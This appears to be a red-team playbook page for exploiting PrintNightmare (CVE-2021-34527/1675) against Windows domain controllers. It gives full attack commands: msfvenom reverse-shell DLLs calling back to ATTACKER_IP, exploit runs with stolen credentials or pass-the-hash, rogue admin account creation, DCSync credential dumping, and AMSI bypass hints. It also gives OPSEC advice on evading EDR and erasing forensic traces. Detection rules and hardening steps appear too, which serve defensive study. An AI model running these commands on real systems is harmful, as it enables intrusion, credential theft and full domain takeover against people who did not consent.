attack-43-printnightmare-cve-2021-34527.md (22688B)
1 --- 2 title: "Attack #43 β PrintNightmare (CVE-2021-34527)" 3 description: "PrintNightmare is a critical RCE vulnerability in the Windows Print Spooler service that allows an authenticated user to execute arbitrary code as SYSTEMβ¦" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory", "credential-access", "privilege-escalation"] 7 tools: ["Impacket", "Mimikatz", "Metasploit", "Meterpreter", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #43 β PrintNightmare (CVE-2021-34527).md" 11 --- 12 # π΅ Attack #43 β PrintNightmare (CVE-2021-34527) 13 14 *** 15 16 ## π How It Works 17 18 PrintNightmare is a **critical RCE vulnerability** in the Windows Print Spooler service that allows an authenticated user to execute arbitrary code as SYSTEM on any Windows machine with the Print Spooler running β including Domain Controllers. The vulnerability exists in the `RpcAddPrinterDriverEx` function, which doesn't properly validate the caller's permissions before loading a DLL. 19 20 > [!info]+ Technical Deep-Dive β RpcAddPrinterDriverEx Privilege Bypass 21 > 1. The [Windows Print Spooler](https://learn.microsoft.com/en-us/windows/win32/printdocs/print-spooler) exposes `RpcAddPrinterDriverEx` (MS-RPRN OpNum 89) to allow remote printer driver installation 22 > 2. The function accepts a `DRIVER_INFO_2` structure containing the path to a DLL file β intended to be a legitimate printer driver 23 > 3. **The vulnerability**: The function checks `SeLoadDriverPrivilege` but the check is **bypassable** β any authenticated user can call the function when `APD_INSTALL_WARNED_DRIVER` (0x8000) flag is set 24 > 4. The attacker hosts a malicious DLL on an SMB share accessible from the target 25 > 5. The target's Print Spooler service loads the DLL **as SYSTEM** β executing arbitrary code with the highest privileges 26 > 6. *On a DC, SYSTEM-level execution β DCSync (Attack #37) β full domain compromise* 27 28 > [!important]+ Two CVEs β RCE vs LPE 29 > `fas:TriangleExclamation` 30 > 1. **CVE-2021-1675** (June 2021) β Originally classified as **Local Privilege Escalation (LPE)** only; patched in June 2021 Patch Tuesday 31 > 2. **CVE-2021-34527** (July 2021) β The **Remote Code Execution (RCE)** variant; the June patch was incomplete and didn't fix the remote vector 32 > 3. Both exploit the same underlying issue in `RpcAddPrinterDriverEx` but via different attack paths: 33 > - **LPE (CVE-2021-1675)**: Load malicious DLL from a local path β SYSTEM on the local machine 34 > - **RCE (CVE-2021-34527)**: Load malicious DLL from a remote SMB share β SYSTEM on the remote machine 35 > 4. *The July 2021 out-of-band patch (KB5004945) addresses the RCE vector; additional hardening (Point and Print restrictions) was added in August 2021* 36 37 *** 38 39 ## βοΈ Prerequisites 40 41 | Requirement | Detail | 42 |---|---| 43 | **Any domain user credentials** | Authentication required (any domain user, no admin needed) | 44 | **Print Spooler running on target** | Default enabled on all Windows machines | 45 | **Target is unpatched** | RCE patched July 2021 (KB5004945); LPE patched June 2021 | 46 | **SMB share accessible** (RCE) | Attacker must host a DLL on an SMB share reachable from the target | 47 | **Local file path** (LPE) | For the LPE variant, DLL must be on the local filesystem | 48 49 *** 50 51 ## π οΈ Tools 52 53 | Tool | Platform | Version | Notes | 54 |---|---|---|---| 55 | [CVE-2021-1675.py](https://github.com/cube0x0/CVE-2021-1675) | Linux/Python | cube0x0's fork of Impacket | RCE exploit β requires modified Impacket | 56 | [printnightmare.py](https://github.com/cube0x0/CVE-2021-1675) | Linux/Python | Python 3 | Alternative script name for the same exploit | 57 | [SharpPrintNightmare](https://github.com/cube0x0/SharpPrintNightmare) | Windows (.NET) | Latest | C# exploit for C2 `execute-assembly` β both LPE and RCE | 58 | [CVE-2021-1675.ps1](https://github.com/calebstewart/CVE-2021-1675) | Windows/PowerShell | Latest | PowerShell LPE exploit (`Invoke-Nightmare`) β creates local admin user | 59 | [Impacket β smbserver.py](https://github.com/fortra/impacket) | Linux | β₯ 0.9.23 | Host malicious DLL on an SMB share | 60 | [msfvenom](https://www.metasploit.com/) | Linux | Metasploit β₯ 6.0 | Generate malicious DLL payloads (reverse shell, adduser, etc.) | 61 62 > [!tip]+ Impacket Version Note 63 > `fas:Lightbulb` 64 > 1. cube0x0's exploit requires a **modified version of Impacket** that supports `SMB_DIALECT_30` β the standard Impacket may fail with SMB3 negotiation errors 65 > 2. Install from cube0x0's fork: `pip install git+https://github.com/cube0x0/impacket` 66 > 3. Or use the standard Impacket with the `--no-smb3` flag if available in your exploit version 67 > 4. *As of Impacket 0.12.0+, SMB3 support is native β the fork may no longer be necessary* 68 69 *** 70 71 ## β±οΈ Time-to-Execute Estimates 72 73 | Operation | Time | Notes | 74 |---|---|---| 75 | DLL generation (msfvenom) | **5β10 seconds** | Quick payload compilation | 76 | SMB server setup | **2β3 seconds** | Start smbserver.py | 77 | RCE exploitation | **5β15 seconds** | DLL loads as SYSTEM; callback received | 78 | LPE exploitation (PowerShell) | **3β10 seconds** | Local admin user created | 79 | Full chain (exploit DC β DCSync) | **30β60 seconds** | SYSTEM on DC β immediate DCSync | 80 81 *** 82 83 ## π» Full Commands 84 85 ### π΄ RCE β Remote Code Execution (CVE-2021-34527) 86 87 ```bash 88 # ββ Step 1: Generate malicious DLL payload ββββββββββββββββββββββββββββββββββββ 89 90 # Reverse shell DLL: 91 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \ 92 -f dll -o evil.dll 93 94 # Meterpreter DLL: 95 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \ 96 -f dll -o evil.dll 97 98 # Add local admin user DLL (custom C code compiled): 99 # The DLL's DllMain runs: net user hacker P@ss123! /add && net localgroup Administrators hacker /add 100 ``` 101 102 ```bash 103 # ββ Step 2: Host malicious DLL on SMB share βββββββββββββββββββββββββββββββββββ 104 smbserver.py share /path/to/dll/ -smb2support 105 # Share available at: \\ATTACKER_IP\share\evil.dll 106 ``` 107 108 ```bash 109 # ββ Step 3: Exploit (cube0x0 β Impacket) βββββββββββββββββββββββββββββββββββββ 110 python3 CVE-2021-1675.py corp.local/low_user:'Password1'@DC01.corp.local \ 111 '\\ATTACKER_IP\share\evil.dll' 112 # DLL executes as SYSTEM on DC01 β reverse shell or local admin created 113 114 # ββ Alternative: printnightmare.py ββββββββββββββββββββββββββββββββββββββββββββ 115 python3 printnightmare.py corp.local/low_user:'Password1'@DC01.corp.local \ 116 -dll '\\ATTACKER_IP\share\evil.dll' 117 118 # ββ With Pass-the-Hash ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 119 python3 CVE-2021-1675.py corp.local/low_user@DC01.corp.local \ 120 -hashes :aabbccdd11223344 '\\ATTACKER_IP\share\evil.dll' 121 ``` 122 123 #### SharpPrintNightmare (C# β for C2) 124 125 ```powershell 126 # ββ RCE variant via C2 execute-assembly βββββββββββββββββββββββββββββββββββββββ 127 execute-assembly /path/to/SharpPrintNightmare.exe \\ATTACKER_IP\share\evil.dll \\DC01.corp.local 128 129 # ββ LPE variant (local priv esc on current machine) ββββββββββββββββββββββββββ 130 execute-assembly /path/to/SharpPrintNightmare.exe C:\Temp\evil.dll 131 ``` 132 133 ### π΄ LPE β Local Privilege Escalation (CVE-2021-1675) 134 135 ```powershell 136 # ββ PowerShell PoC (Invoke-Nightmare) βββββββββββββββββββββββββββββββββββββββββ 137 Import-Module .\CVE-2021-1675.ps1 138 Invoke-Nightmare -DriverName "Xerox" -NewUser "hacker" -NewPassword "P@ssword123!" 139 # Creates local admin user "hacker" via Print Spooler exploitation 140 # Runs entirely locally β no SMB share needed 141 142 # ββ Verify the user was created βββββββββββββββββββββββββββββββββββββββββββββββ 143 net user hacker 144 net localgroup Administrators 145 ``` 146 147 ### π΄ Post-Exploitation (After SYSTEM on DC) 148 149 ```bash 150 # ββ If you got a SYSTEM shell on a DC, immediately DCSync βββββββββββββββββββββ 151 # From the SYSTEM shell: 152 mimikatz.exe 153 privilege::debug 154 lsadump::dcsync /domain:corp.local /all /csv 155 156 # ββ Or from Linux with the new local admin ββββββββββββββββββββββββββββββββββββ 157 secretsdump.py corp.local/hacker:'P@ssword123!'@DC01.corp.local \ 158 -just-dc -outputfile domain_dump 159 ``` 160 161 *** 162 163 ## π― OPSEC Tips 164 165 1. **PrintNightmare exploitation is VERY noisy** β the DLL loading generates multiple events (driver installation, service creation, Sysmon image load) and most EDR solutions detect it immediately 166 2. **Use the LPE variant for lateral movement** when you already have a foothold on a machine β it's less visible than remote RCE because no SMB share access is needed 167 3. **The SMB share must be accessible from the target** β if outbound SMB is firewalled from the DC, the DLL can't be loaded; consider hosting on an already-compromised internal host 168 4. **Custom DLLs are stealthier than msfvenom payloads** β msfvenom DLL signatures are well-known; compile a custom DLL with adduser or reverse shell code 169 5. **Clean up after exploitation** β the printer driver and DLL persist on the target; remove them to reduce forensic evidence 170 6. **Target workstations, not DCs, when possible** β exploiting a workstation is less monitored than a DC; then use lateral movement to reach the DC 171 172 ### π OpSec Ranking 173 174 | Method | Stealth | Speed | Reliability | Notes | 175 |---|---|---|---|---| 176 | LPE (PowerShell Invoke-Nightmare) | π‘ Medium | π’ Fast | π’ High | Local only; detected by PowerShell logging | 177 | RCE (cube0x0 + msfvenom DLL) | π΄ Low | π’ Fast | π‘ Medium | SMB share + known DLL signature = easy detection | 178 | RCE (custom compiled DLL) | π‘ Medium | π’ Fast | π‘ Medium | Better than msfvenom but driver install still logged | 179 | SharpPrintNightmare (C2) | π‘ Medium | π’ Fast | π‘ Medium | In-memory execution avoids disk artifacts | 180 181 *** 182 183 ## π‘οΈ Detection β Event IDs 184 185 | Event ID | Source | What to Look For | 186 |---|---|---| 187 | **808** | PrintService/Admin | Printer driver installation failed/suspicious β DLL load events from Print Spooler | 188 | **316** | PowerShell | PowerShell script execution β `Invoke-Nightmare` or CVE-2021-1675.ps1 | 189 | **7045** | System Log | New service/driver installed β Print Spooler loading a new "printer driver" | 190 | **4688** | Security Log | Process creation from spoolsv.exe β child processes spawned by the malicious DLL | 191 | **Sysmon 7** | Sysmon | Image loaded β DLL loaded by spoolsv.exe from non-standard path (SMB share or temp directory) | 192 | **Sysmon 11** | Sysmon | File creation β DLL file written to `C:\Windows\System32\spool\drivers\x64\` | 193 | **Sysmon 1** | Sysmon | Process creation β cmd.exe or powershell.exe spawned as child of spoolsv.exe | 194 | **Sysmon 3** | Sysmon | Network connection β spoolsv.exe connecting to attacker SMB share | 195 196 ### π Sigma Rules 197 198 ```yaml 199 # ββ SigmaHQ β PrintNightmare Exploitation (Spooler Child Process) βββββββββββββ 200 title: PrintNightmare Exploitation β Suspicious Spooler Child Process 201 id: dca4d40b-printnight-spooler-child 202 status: stable 203 logsource: 204 product: windows 205 category: process_creation 206 detection: 207 selection: 208 ParentImage|endswith: '\spoolsv.exe' 209 Image|endswith: 210 - '\cmd.exe' 211 - '\powershell.exe' 212 - '\pwsh.exe' 213 - '\rundll32.exe' 214 - '\net.exe' 215 - '\net1.exe' 216 condition: selection 217 level: critical 218 tags: 219 - attack.execution 220 - attack.t1210 221 - cve.2021.34527 222 ``` 223 224 ```yaml 225 # ββ SigmaHQ β Suspicious DLL Loaded by Spooler βββββββββββββββββββββββββββββββ 226 title: DLL Loaded by Print Spooler from Non-Standard Path 227 id: b5c6d7e8-spooler-dll-load 228 logsource: 229 product: windows 230 category: image_load 231 detection: 232 selection: 233 Image|endswith: '\spoolsv.exe' 234 filter_legitimate: 235 ImageLoaded|startswith: 236 - 'C:\Windows\System32\' 237 - 'C:\Windows\SysWOW64\' 238 condition: selection and not filter_legitimate 239 level: critical 240 ``` 241 242 ### π‘οΈ EDR-Specific Detections 243 244 > [!warning]+ Microsoft Defender for Identity (MDI) / Defender for Endpoint 245 > 1. **"Suspicious printer driver installation"** β detects `RpcAddPrinterDriverEx` calls from non-admin users 246 > 2. **"Suspicious DLL loading by spoolsv.exe"** β behavioral detection for Print Spooler loading DLLs from SMB shares or temp directories 247 > 3. Defender for Endpoint has specific PrintNightmare detections that trigger on both the LPE and RCE variants 248 > 4. *Microsoft considers this a high-priority detection β Defender updates within 24 hours of CVE disclosure included signatures* 249 250 > [!warning]+ CrowdStrike Falcon 251 > 1. **"PrintNightmare Exploitation Detected"** β high-fidelity behavioral detection for RpcAddPrinterDriverEx exploitation 252 > 2. **"Malicious DLL Loaded by Spooler Service"** β monitors spoolsv.exe DLL loading from non-standard paths 253 > 3. Process tree analysis: `spoolsv.exe β cmd.exe` or `spoolsv.exe β rundll32.exe` = critical alert 254 255 > [!warning]+ Elastic Security 256 > 1. Rule: **"PrintNightmare β Suspicious DLL Loaded by Spooler"** β Sysmon Event 7 correlation 257 > 2. Rule: **"Suspicious Child Process of Spooler Service"** β process creation monitoring 258 > 3. Rule: **"Remote Printer Driver Installation"** β network-level detection for remote `RpcAddPrinterDriverEx` calls 259 260 *** 261 262 ## π¬ Forensic Artifacts 263 264 | Artifact | Location | Details | 265 |---|---|---| 266 | **Printer driver DLL** | `C:\Windows\System32\spool\drivers\x64\3\` | The malicious DLL is copied to the driver store β persists after exploitation | 267 | **Event 808** | PrintService/Admin log | Driver installation event with DLL path | 268 | **Event 7045** | System Log | New service/driver installed β includes driver name | 269 | **spoolsv.exe child processes** | Event 4688 / Sysmon 1 | cmd.exe, powershell.exe, or other executables spawned by spoolsv.exe | 270 | **SMB connection** | Sysmon 3 / network capture | spoolsv.exe connecting to attacker's SMB share to load the DLL | 271 | **New local user** (LPE variant) | `net user` / SAM registry | If Invoke-Nightmare was used, a new local admin account exists | 272 | **Prefetch** | `C:\Windows\Prefetch\` | SPOOLSV.EXE prefetch file shows loaded DLLs | 273 | **Registry** | `HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\` | Driver registration entries | 274 275 *** 276 277 > [!important]+ Windows Server Version & Patch Timeline 278 > 1. **June 2021 (KB5003637)**: CVE-2021-1675 patch β addresses LPE only; RCE still exploitable 279 > 2. **July 2021 (KB5004945)**: Out-of-band emergency patch for CVE-2021-34527 β addresses RCE; but incomplete β researchers found bypasses 280 > 3. **August 2021 (KB5005565)**: Additional hardening β `RestrictDriverInstallationToAdministrators` registry key; Point and Print restrictions 281 > 4. **Server 2012 R2**: Vulnerable; patches available 282 > 5. **Server 2016**: Vulnerable; patches available; `RestrictDriverInstallationToAdministrators` recommended 283 > 6. **Server 2019**: Vulnerable; same patch timeline; CVE re-exploitable with Point and Print misconfiguration 284 > 7. **Server 2022**: Shipped with fixes included; Point and Print restrictions enabled by default 285 > 8. **Server 2025**: Print Spooler hardened; `RestrictDriverInstallationToAdministrators = 1` by default; Point and Print disabled by default 286 > 9. *Multiple patch bypasses were discovered after each fix β the definitive mitigation is disabling Print Spooler on servers that don't need it* 287 288 *** 289 290 ## π Hardening & Prevention 291 292 ```powershell 293 # ββ 1. Disable Print Spooler on DCs and servers (most effective) ββββββββββββββ 294 Stop-Service -Name Spooler -Force 295 Set-Service -Name Spooler -StartupType Disabled 296 297 # ββ 2. GPO β Disable Spooler on server OUs βββββββββββββββββββββββββββββββββββ 298 # Computer Configuration β Policies β Windows Settings β Security Settings β 299 # System Services β Print Spooler β Startup Type: Disabled 300 301 # ββ 3. Restrict printer driver installation to admins only ββββββββββββββββββββ 302 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" ` 303 -Name "RestrictDriverInstallationToAdministrators" -Value 1 -Type DWord 304 305 # ββ 4. Disable Point and Print restrictions βββββββββββββββββββββββββββββββββββ 306 # GPO β Computer Configuration β Admin Templates β Printers β 307 # "Point and Print Restrictions" = Disabled 308 # Or registry: 309 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" ` 310 -Name "NoWarningNoElevationOnInstall" -Value 0 -Type DWord 311 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" ` 312 -Name "UpdatePromptSettings" -Value 0 -Type DWord 313 314 # ββ 5. Restrict Point and Print to approved servers ββββββββββββββββββββββββββ 315 # GPO β Computer Configuration β Admin Templates β Printers β 316 # "Package Point and Print - Approved Servers" = Enabled 317 # Server list: only legitimate print servers 318 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" ` 319 -Name "PackagePointAndPrintServerList" -Value 1 -Type DWord 320 321 # ββ 6. Apply all patches βββββββββββββββββββββββββββββββββββββββββββββββββββββ 322 # June 2021: KB5003637 (LPE fix) 323 # July 2021: KB5004945 (RCE fix) 324 # August 2021: KB5005565 (hardening β Point and Print restrictions) 325 # Verify: Get-HotFix | Where-Object { $_.HotFixID -match 'KB5004945|KB5005565' } 326 327 # ββ 7. Monitor spoolsv.exe for suspicious child processes ββββββββββββββββββββ 328 # Sysmon config: 329 # <ProcessCreate onmatch="include"> 330 # <ParentImage condition="end with">spoolsv.exe</ParentImage> 331 # </ProcessCreate> 332 # <ImageLoad onmatch="include"> 333 # <Image condition="end with">spoolsv.exe</Image> 334 # </ImageLoad> 335 ``` 336 337 *** 338 339 ## π§© Troubleshooting 340 341 | Error | Cause | Fix | 342 |---|---|---| 343 | `STATUS_ACCESS_DENIED` on exploit | Target is patched (July 2021+) | Verify patch status; if patched, this attack path is closed β try other escalation methods | 344 | DLL not loading β `Path not found` | SMB share not accessible from target or wrong UNC path | Verify `\\ATTACKER_IP\share\evil.dll` is accessible; ensure `smbserver.py` is running with `-smb2support` | 345 | Exploit succeeds but no callback | DLL payload issue or outbound connection blocked | Test DLL locally first; verify attacker listener is running; check firewall allows outbound from target | 346 | `Invoke-Nightmare` fails with execution policy | PowerShell constrained language mode or AMSI | Bypass: `powershell -ep bypass`; for AMSI: use in-memory bypass or use the C# variant instead | 347 | `cube0x0 exploit: SMB3 negotiation failed` | Standard Impacket doesn't support required SMB dialect | Install cube0x0's Impacket fork: `pip install git+https://github.com/cube0x0/impacket` | 348 | DLL loads but crashes spoolsv.exe | DLL architecture mismatch (x86 vs x64) or bad DLL | Generate x64 DLL: `msfvenom -a x64 ...`; ensure DLL exports `DllMain` correctly | 349 | Exploit works once but subsequent attempts fail | Spooler service crashed and hasn't restarted | Wait for auto-restart or manually restart: `sc \\DC01 start Spooler` (if you have access) | 350 | Point and Print bypass doesn't work | August 2021 hardening applied correctly | `RestrictDriverInstallationToAdministrators = 1` blocks all bypasses β this attack path is fully closed | 351 352 *** 353 354 ## πΊοΈ MITRE ATT&CK 355 356 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 357 |---|---|---|---|---| 358 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | LPE via CVE-2021-1675 β load malicious DLL as SYSTEM via Print Spooler | Multiple ransomware groups (Magniber, Vice Society) | 359 | **Lateral Movement** | [T1210](https://attack.mitre.org/techniques/T1210/) | Exploitation of Remote Services | RCE via CVE-2021-34527 β remotely load DLL on target machine as SYSTEM | [Magniber ransomware](https://www.trendmicro.com/en_us/research/21/h/printnightmare-exploited-by-magniber-ransomware.html) | 360 | **Execution** | [T1569](https://attack.mitre.org/techniques/T1569/) | [.002 β Service Execution](https://attack.mitre.org/techniques/T1569/002/) | Malicious DLL executed as a printer driver service by spoolsv.exe | Chained technique | 361 362 > [!tip]+ Real-World Exploitation 363 > `fas:Lightbulb` 364 > 1. **Magniber ransomware** β One of the first ransomware families to incorporate PrintNightmare within weeks of disclosure; targeted South Korean organizations 365 > 2. **Vice Society** β Used PrintNightmare for initial access and lateral movement in education sector attacks 366 > 3. **CISA Alert AA21-179A** β Emergency alert warning of active PrintNightmare exploitation in the wild 367 > 4. *PrintNightmare was weaponized faster than almost any other vulnerability in 2021 β within 48 hours of the PoC being accidentally published on GitHub, active exploitation was detected* 368 369 *** 370 371 ## π Attack Chain Context 372 373 ``` 374 [PrintNightmare] βββ RCE as SYSTEM on any Windows host 375 β 376 ββββ π₯ CVE-2021-34527 (RCE) + CVE-2021-1675 (LPE) 377 ββββ π On DC: SYSTEM β DCSync (Attack #37) β full domain compromise 378 ββββ π On workstation: SYSTEM β credential dumping β lateral movement 379 ββββ π Related: PrinterBug (Attack #42) β also Print Spooler, but coercion not RCE 380 ββββ π Multiple incomplete patches β verify ALL patches + registry hardening 381 ββββ π Defeated by: July 2021 patches + August 2021 hardening, disable Print Spooler 382 ``` 383 384 *** 385 386 > β **Attack #43 β PrintNightmare complete.**